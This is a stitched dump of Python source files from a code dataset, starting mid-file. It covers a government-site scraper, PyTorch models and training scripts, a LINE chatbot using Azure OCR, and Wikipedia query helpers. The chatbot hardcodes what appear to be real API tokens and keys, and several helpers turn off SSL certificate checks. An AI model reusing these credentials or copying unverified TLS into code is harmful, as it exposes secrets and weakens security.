**kwargs):\n \"\"\"requests of get\"\"\"\n\n url = kwargs.get(\"url\")\n header = kwargs.get(\"header\")\n try:\n data = kwargs.get(\"data\")\n except:\n data = None\n files = kwargs.get(\"files\")\n\n sesscion_a = self.get_session()\n\n print(\"---> 开始请求网址:{}\".format(url))\n start_time = time.time()\n retry_count = 5\n while retry_count > 0:\n try:\n\n if isinstance(data, dict):\n resp = sesscion_a.post(\n url,\n headers=header,\n data=json.dumps(data),\n timeout=(10, 60))\n elif isinstance(files, dict):\n resp = sesscion_a.post(url, files=files, timeout=(10, 60))\n elif data:\n resp = sesscion_a.post(\n url, headers=header, data=data, timeout=(10, 60))\n else:\n resp = sesscion_a.get(\n url,\n headers=header,\n allow_redirects=False,\n timeout=(10, 60))\n retry_count = 0\n except Exception as exc:\n retry_count -= 1\n\n end_time = time.time()\n\n try:\n if resp.status_code == 200:\n magic_time = end_time - start_time\n return resp\n else:\n print(\"--->Info {} 请求失败!状态码为{},共耗时{:.3}秒\".format(\n url, resp.status_code, end_time - start_time))\n except UnboundLocalError as exc:\n print(\"--->Error: deal re is error, the error is {}\".format(exc))\n return None\n\n def run(self, path, sign=None, header={}, **kwargs):\n resp = self.deal_re(url=path, header=header, **kwargs)\n if sign:\n return resp.content\n else:\n return resp.text\n\n\nclass DealGhzrzyw(object):\n def __init__(self):\n self.url = 
\"http://ghzrzyw.beijing.gov.cn/sjzy/front/landsold/oprcadastral.do?iid={}\"\n self.header = {\n \"Host\": \"ghzrzyw.beijing.gov.cn\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\":\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\",\n \"Accept\":\n \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\"\n }\n self.info = pd.DataFrame()\n self.request = Query()\n self.run()\n\n def main(self, path):\n resp = self.request.run(path, header=self.header)\n info_ = {}\n for data in pd.read_html(resp)[-1].values:\n key = data[0].replace(\":\", \"\")\n value = data[-1]\n if \"浏览次数\" in key:\n key = \"浏览次数\"\n value = value.replace(\"浏览次数:\", \"\")\n elif key == \"返回\":\n continue\n info_[key] = value\n self.info = self.info.append(info_, ignore_index=True)\n\n def run(self):\n try:\n for page in range(9000):\n self.main(self.url.format(page + 1))\n time.sleep(random.randint(0, 5))\n self.info.to_excel(\"./data.xlsx\", index=False)\n except Exception as exc:\n self.info.to_excel(\"./dirty_data.xlsx\", index=False)\n print(\"---> Error: the error is {}, the page is {}\".format(exc, page))\n\n\nif __name__ == \"__main__\":\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n DealGhzrzyw()", "sub_path": "successed/8.26/ghzrzyw/spider.py", "file_name": "spider.py", "file_ext": "py", "file_size_in_byte": 4585, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "urllib3.disable_warnings", "line_number": 16, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 16, "usage_type": "attribute"}, {"api_name": "requests.adapters", "line_number": 19, "usage_type": "attribute"}, {"api_name": "requests.session", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.adapters.HTTPAdapter", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.adapters", "line_number": 25, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "time.time", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 113, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 128, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 128, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 136, "usage_type": "call"}]} +{"seq_id": "150214178", "text": "import torch\nimport torch.nn as nn\nimport torch.autograd as autograd\n\n\n\nclass ReinforcedLSTM(nn.Module):\n def __init__(self, IMAGE_SIZE, HIDDEN_NODES, HIDDEN_LAYERS, OUTPUT_CLASSES, BATCH_SIZE, CUDA):\n super(ReinforcedLSTM, self).__init__()\n\n # Parameters\n self.image_size = IMAGE_SIZE\n self.hidden_nodes = HIDDEN_NODES\n self.hidden_layers = HIDDEN_LAYERS\n self.output_size = OUTPUT_CLASSES\n self.gpu = CUDA\n\n print(\"Model Input Size: \", str(self.image_size + self.output_size))\n print(\"Model Output Size: \", str(self.output_size + 1))\n\n # 
Architecture\n self.lstm = nn.LSTM(self.image_size + self.output_size, self.hidden_nodes)\n self.hidden2probs = nn.Linear(self.hidden_nodes, self.output_size + 1)\n\n\n def init_hidden(self, batch_size):\n if (self.gpu):\n h0 = autograd.Variable(torch.zeros(self.hidden_layers, batch_size, self.hidden_nodes)).cuda()\n c0 = autograd.Variable(torch.zeros(self.hidden_layers, batch_size, self.hidden_nodes)).cuda()\n else:\n h0 = autograd.Variable(torch.zeros(self.hidden_layers, batch_size, self.hidden_nodes))\n c0 = autograd.Variable(torch.zeros(self.hidden_layers, batch_size, self.hidden_nodes))\n\n return (h0, c0)\n\n # Not sure if necessary:\n def reset_hidden(self, batch_size):\n hidden = self.init_hidden(batch_size)\n return (hidden[0].detach(), hidden[1].detach())\n\n \n def forward(self, x, hidden, seq=1):\n batch_size = hidden[1].size()[1]\n x = x.view(seq, batch_size, -1)\n lstm_out, next_hidden = self.lstm(x, hidden)\n x = self.hidden2probs(lstm_out[-1])\n return x, next_hidden\n", "sub_path": "reinforcement/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1732, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.nn.LSTM", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "178944773", "text": "'''Train CIFAR10 with PyTorch.'''\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\n\nimport vgg\n\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\ntrain_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=True, download=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n normalize\n ])), batch_size=64, shuffle=True)\n\ntest_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n normalize])), batch_size=64, shuffle=False)\n\n\n# 开始训练,共训练 args.epochs 周期\ndef train(model, device, train_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n #\n criterion = nn.CrossEntropyLoss()\n loss = 
criterion(output, target)\n\n loss.backward()\n optimizer.step()\n if batch_idx % 100 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n\ndef test(model, device, test_loader):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n\n criterion = nn.CrossEntropyLoss()\n test_loss += criterion(output, target).item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n\nif __name__ == \"__main__\":\n\n epochs = 5\n use_cuda = True\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n model = vgg.VGG().to(device)\n\n save_model = True\n optimizer = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n\n for epoch in range(epochs):\n # 训练\n train(model, device, train_loader, optimizer, epoch)\n # 测试代码\n test(model, device, test_loader)\n\n # 如果设置保存模型,就开始保存模型,保存为 mnist_cnn.pt\n if save_model:\n torch.save(model.state_dict(), \"vgg.pt\")\n", "sub_path": "cifar/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torchvision.transforms.Normalize", "line_number": 9, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 12, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 12, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 14, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 19, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 19, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 20, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 67, "usage_type": "call"}, 
{"api_name": "vgg.VGG", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "47130625", "text": "# 載入相關套件\nfrom flask import Flask, request, abort\nfrom linebot import LineBotApi, WebhookHandler\nfrom linebot.exceptions import InvalidSignatureError\nfrom linebot.models import MessageEvent, TextMessage, TextSendMessage, ImageMessage\nfrom azure.ai.formrecognizer import FormRecognizerClient\nfrom azure.core.credentials import AzureKeyCredential\nfrom datetime import datetime\nimport re\nimport pandas as pd\n\n# create flask server\napp = Flask(__name__)\n# your linebot message API - Channel access token (from LINE Developer)\nline_bot_api = LineBotApi('T9vMMKzQTDhvdsFJWFDtjVKcI56KL0bx3cyKOTN8jN3AWG4lrzMRP1C3Sc69c+a08iHOeqHDkMOvDOSyqD5+zwCdqdSSHTDSBz2WGJ3nezkX5lLZ6A23tgNlwLRHl/X5mQaSt0UBvSPHJpFmp9hHiAdB04t89/1O/w1cDnyilFU=')\n# your linebot message API - Channel secret\nhandler = WebhookHandler('9bfda1bf917044c86fe056c26660e234')\n\n\n# linebot接收訊息\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n print('receive msg')\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. Please check your channel access token/channel secret.\")\n abort(400)\n return 'OK'\n\n# linebot處理文字訊息\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n # linebot回傳訊息\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text='收到您的訊息囉!'))\n\n\n# linebot處理照片訊息\n@handler.add(MessageEvent, message=ImageMessage)\ndef handle_image_message(event):\n # 使用者傳送的照片\n message_content = line_bot_api.get_message_content(event.message.id)\n\n # 照片儲存名稱\n fileName = event.message.id + '.jpg'\n\n # 儲存照片\n with open('./' + fileName, 'wb')as f:\n for chunk in message_content.iter_content():\n f.write(chunk)\n \n # Azure Form Recognizer\n endpoint = \"https://formfong.cognitiveservices.azure.com/\"\n credential = AzureKeyCredential(\"61e429884959460abc7c4955f3a108be\")\n\n form_recognizer_client = FormRecognizerClient(endpoint, credential)\n \n # 讀取圖片\n local_image = open('./' + fileName, 'rb')\n\n poller = form_recognizer_client.begin_recognize_content(local_image)\n form_pages = poller.result()\n\n datas = []\n for content in form_pages:\n for table in content.tables:\n for cell in table.cells:\n datas.append(cell.text)\n \n # 大寫字母O ---> 數字0\n for i in range(len(datas)):\n if len(datas[i]) == 10:\n datas[i] = datas[i].replace('O', '0')\n\n regex = re.compile(r'[A-Z,\\d]{2}\\d{6}[G,\\d]\\d')\n med_no = list(filter(regex.match, datas))\n \n result = ''\n for drug in med_no:\n A = [drug]\n df = pd.read_csv(\"notices.csv\")\n df_med = df[df[\"健保代碼\"].isin(A)]\n for (colname,colval) in df_med.iteritems():\n content = str('%s: %s,'%(colname, colval.values)) + '\\n'\n result += content\n \n # linebot測試回傳健保代碼 \n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=result))\n \n# 開始運作Flask\nif __name__ == \"__main__\":\n app.run(host='127.0.0.1', port=12345)", "sub_path": "linebot/appForm.py", "file_name": "appForm.py", "file_ext": "py", "file_size_in_byte": 3440, "program_lang": "python", 
"lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "linebot.LineBotApi", "line_number": 15, "usage_type": "call"}, {"api_name": "linebot.WebhookHandler", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "linebot.exceptions.InvalidSignatureError", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 36, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 45, "usage_type": "call"}, {"api_name": "linebot.models.MessageEvent", "line_number": 40, "usage_type": "argument"}, {"api_name": "linebot.models.TextMessage", "line_number": 40, "usage_type": "name"}, {"api_name": "azure.core.credentials.AzureKeyCredential", "line_number": 64, "usage_type": "call"}, {"api_name": "azure.ai.formrecognizer.FormRecognizerClient", "line_number": 66, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 85, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 91, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 100, "usage_type": "call"}, {"api_name": "linebot.models.MessageEvent", "line_number": 49, "usage_type": "argument"}, {"api_name": "linebot.models.ImageMessage", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "148338666", "text": "import torch.nn as nn\nimport math\nimport torch.utils.model_zoo as model_zoo\n\n\n__all__ = ['ResNet', 'resnet50']\n\n\nmodel_urls = {\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n}\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv3d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv3d(inplanes, planes, kernel_size=(3, 1, 1), padding=(1, 0, 0), bias=False)\n self.bn1 = nn.BatchNorm3d(planes)\n self.conv2 = nn.Conv3d(planes, planes, kernel_size=(1, 3, 3), stride=(1, stride, stride),\n padding=(0, 1, 1), bias=False)\n self.bn2 = nn.BatchNorm3d(planes)\n self.conv3 = nn.Conv3d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm3d(planes * 4)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=1000):\n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv3d(3, 64, kernel_size=(5, 7, 7), stride=(1, 2, 2), padding=(2, 3, 3),\n bias=False)\n self.bn1 = nn.BatchNorm3d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool3d(kernel_size=(1, 3, 3), stride=(1, 2, 2), padding=(0, 1, 1))\n self.layer1 = self._make_layer(block, 64, 
layers[0])\n self.maxpool2 = nn.MaxPool3d(kernel_size=(3, 1, 1), stride=(2, 1, 1), padding=(1, 0, 0))\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3])\n self.avgpool = nn.AvgPool3d(kernel_size=(16, 14, 14), stride=1)\n self.dropout = nn.Dropout(p=0.3)\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n self.fc_in = 512 * block.expansion\n\n for m in self.modules():\n if isinstance(m, nn.Conv3d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm3d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv3d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=(1, stride, stride), bias=False),\n nn.BatchNorm3d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def replace_logits(self, num_classes):\n self.fc = nn.Linear(self.fc_in, num_classes)\n\n def forward(self, x):\n #print(x.shape)\n x = self.conv1(x)\n #print('conv1:', x.shape)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n #print('maxpool1:', x.shape)\n\n x = self.layer1(x)\n #print('layer1:', x.shape)\n x = self.maxpool2(x)\n #print('maxpool2:', x.shape)\n x = self.layer2(x)\n #print('layer2:', x.shape)\n x = self.layer3(x)\n #print('layer3:', x.shape)\n x = self.layer4(x)\n #print('layer4:', x.shape)\n\n x = self.avgpool(x)\n #print('avgpool:', x.shape)\n x = x.view(x.size(0), -1)\n #print('view:', x.shape)\n x = self.dropout(x)\n x = self.fc(x)\n\n return x\n\n\ndef resnet50(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)\n # if pretrained:\n # model.load_state_dict(model_zoo.load_url(model_urls['resnet50']))\n return model\n\n\nif __name__ == '__main__':\n import torch\n from torch.autograd import Variable\n x = Variable(torch.ones([1, 3, 32, 224, 224]))\n net = resnet50()\n net(x)\n", "sub_path": "resnet3d.py", "file_name": "resnet3d.py", "file_ext": "py", "file_size_in_byte": 5011, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Conv3d", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": 
"name"}, {"api_name": "torch.nn.Conv3d", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool3d", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool3d", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.AvgPool3d", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 80, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.Conv3d", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm3d", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 152, "usage_type": "call"}]} +{"seq_id": "79512560", "text": "import ssl\nimport urllib.parse\nimport urllib.request\nimport json\n\n\ndef send_json_request_to_ruwiki(title, api_action):\n title = title.replace(' ', '_')\n title = urllib.parse.quote(title)\n url = 'http://ru.wikipedia.org/w/api.php?action=query&format=json&formatversion=2'\n url += '&titles='+title\n if not api_action.startswith('&'):\n url += '&'\n url += api_action\n\n context = ssl._create_unverified_context()\n req = urllib.request.Request(\n url,\n data=None,\n headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\n        }\n    )\n    with urllib.request.urlopen(req, context=context, timeout=20.0) as request:\n        return json.loads(request.read().decode('utf-8'))\n\n\ndef send_sparql_request(sparql):\n    sparql = urllib.parse.quote(sparql)\n    url = 'https://query.wikidata.org/sparql?format=json&query=' + sparql\n    context = ssl._create_unverified_context()\n    req = urllib.request.Request(\n        url,\n        data=None,\n        headers={\n            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\n        }\n    )\n\n    with urllib.request.urlopen(req, context=context, timeout=60.0) as request:\n        data = request.read().decode('utf-8')\n        with open(\"sparql_raw_response.txt\", \"w\") as outp:\n            outp.write(data)\n        return json.loads(data)\n\n\ndef get_title_from_wiki_link(logger, url, normalize=False):\n    prefix = 'https://ru.wikipedia.org/wiki/'\n    if url.startswith(prefix):\n        fio = url[len(prefix):]\n        fio = urllib.parse.unquote(fio)\n        fio = fio.replace('_', ' ')\n        if normalize:\n            response = send_json_request_to_ruwiki(fio, 'redirects')\n            redirects = response.get('query', dict()).get('redirects', list())\n            if len(redirects) > 0:\n                return redirects[0]['to']\n            normalized = response.get('query', dict()).get('normalized', list())\n            if len(normalized) > 0:\n                return normalized[0]['to']\n        return fio\n    else:\n        logger.error(\"unknown link type {}\".format(url))\n        return url\n\n\ndef get_wikidata_data_repository(wikidata_id):\n    import pywikibot  # missing from the original imports; kept local so the other helpers work without pywikibot installed\n    page = pywikibot.ItemPage(wikidata_id)\n    return page.data_repository()\n\n", "sub_path": "tools/common/wiki_bots.py", "file_name": "wiki_bots.py", "file_ext": "py", "file_size_in_byte": 2400, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "urllib.parse.parse.quote", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 9, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 9, "usage_type": "name"}, {"api_name": "ssl._create_unverified_context", "line_number": 16, "usage_type": "call"}, {"api_name": "urllib.parse.request.Request", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 17, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 17, "usage_type": "name"}, {"api_name": "urllib.parse.request.urlopen", "line_number": 24, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 24, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 24, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.parse.parse.quote", "line_number": 29, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 29, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 29, "usage_type": "name"}, {"api_name": "ssl._create_unverified_context", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib.parse.request.Request", "line_number": 32, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 32, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 32, "usage_type": "name"}, {"api_name": "urllib.parse.request.urlopen", "line_number": 40, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 40, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 40, "usage_type": "name"}, {"api_name": "json.loads", 
